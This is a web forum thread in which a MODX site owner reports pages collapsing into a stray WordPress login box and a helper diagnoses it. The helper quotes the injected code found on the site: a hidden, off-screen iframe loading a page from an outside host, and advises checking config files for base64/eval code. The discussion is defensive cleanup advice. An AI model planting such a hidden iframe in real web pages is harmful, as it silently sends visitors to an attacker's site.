We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 5994
    • 46 Posts
    Hi guys,

    I have a modx website at auctionbandits.com and until yesterday, all was fine. But yesterday afternoon I visited my site, to find that every page I went to would open for a moment, then shrinks to a tiny window in the corner. It did this on all of the several computers I've tried to access it on. What's weird is that the little box is a Wordpress login, and I don't even have Wordpress installed on my server. I also have not modified my site in months. I think I'm running 1.0.5 or 1.0.6 so I know I should upgrade, but I was wondering if anyone has seen anything like this before. Any insight to this weirdness is greatly appreciated!

    - Cris
      • 28042 ☆ A M B ☆
      • 24,524 Posts
      Email or PM me details and I'll take a look.
        Studying MODX in the desert - http://sottwell.com
        Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
        Join the Slack Community - http://modx.org
        • 28042 ☆ A M B ☆
        • 24,524 Posts
        Just looking at the source for the page, then downloading the page and playing with it on localhost, the problem is that iframe at the bottom of the page. You really need to check your pages with the W3C Validator. Plenty of errors in the page.

        At first glance, this looks like a broken hack.
        <style>body {overflow-x:hidden;overflow-y:auto;} </style>
        <iframe id="apxlp" name="apxlp" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://dev.estadodigital.com/clik.php" > </iframe>
        
          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 5994
          • 46 Posts
          Thank you for that! Unfortunately though, I get the same little frame when I try to go to my /manager. Any idea what would be the best way to eradicate the hacker's failed attempt?
            • 28042 ☆ A M B ☆
            • 24,524 Posts
            Check your index.php files, and the config.inc.php file for something odd-looking, with base_64 and/or eval in a javascript.
              Studying MODX in the desert - http://sottwell.com
              Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
              Join the Slack Community - http://modx.org